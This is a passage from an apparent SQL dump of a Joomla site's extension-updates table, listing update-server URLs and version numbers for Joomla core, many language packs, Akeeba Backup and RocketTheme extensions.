package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(18646,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18647,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18648,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18649,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18650,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(18651,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(18652,3,0,'French','','pkg_fr-FR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(18653,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(18654,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(18655,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(18656,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(18657,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(18658,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(18659,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(18660,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(18661,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(18662,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(18663,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(18664,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(18665,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(18666,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(18667,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(18668,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(18669,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(18670,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(18671,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(18672,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(18673,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(18674,3,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(18675,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(18676,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(18677,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(18678,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(18679,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(18680,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(18681,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(18682,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(18683,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(18684,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(18685,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(18686,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(18687,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(18688,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(18689,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(18690,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(18691,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(18692,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(18693,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(18694,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(18695,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(18696,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(18697,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(18698,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(18699,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(18700,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(18701,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(18702,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(18703,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(18704,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(18705,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(18706,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(18707,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(18708,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(18709,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(18710,57,0,'French','','pkg_fr-FR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(18711,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(18712,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(18713,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(18714,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(18715,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(18716,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(18717,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(18718,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(18719,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(18720,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(18721,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(18722,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(18723,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(18724,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(18725,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(18726,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(18727,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(18728,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(18729,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(18730,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(18731,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(18732,57,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(18733,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(18734,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(18735,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(18736,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(18737,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(18738,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(18739,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(18740,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(18741,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(18742,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(18743,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(18744,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(18745,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(18746,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(18747,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(18748,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(18749,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(18750,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(18751,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(18752,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(18753,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(18754,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(18755,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(18756,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(18757,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(18758,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.0.13','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/download/fef/1-0-13.html',''),(18759,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.3.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(18760,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.6.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-2.html',''),(18761,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18762,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18763,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18764,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18765,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(18766,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(18767,3,0,'French','','pkg_fr-FR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(18768,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(18769,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(18770,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(18771,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(18772,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(18773,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(18774,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(18775,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(18776,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(18777,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(18778,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(18779,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(18780,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(18781,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(18782,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(18783,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(18784,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(18785,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(18786,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(18787,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(18788,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(18789,3,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(18790,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(18791,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(18792,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(18793,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(18794,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(18795,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(18796,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(18797,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(18798,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(18799,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(18800,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(18801,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(18802,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(18803,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(18804,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(18805,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(18806,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(18807,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(18808,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(18809,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(18810,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(18811,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(18812,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(18813,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(18814,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(18815,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(18816,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(18817,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(18818,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(18819,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(18820,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(18821,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(18822,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(18823,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(18824,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(18825,57,0,'French','','pkg_fr-FR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(18826,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(18827,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(18828,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(18829,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(18830,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(18831,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(18832,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(18833,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(18834,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(18835,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(18836,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(18837,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(18838,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(18839,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(18840,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(18841,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(18842,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(18843,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(18844,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(18845,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(18846,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(18847,57,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(18848,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(18849,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(18850,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(18851,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(18852,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(18853,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(18854,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(18855,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(18856,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(18857,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(18858,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(18859,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(18860,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(18861,57,0,'English 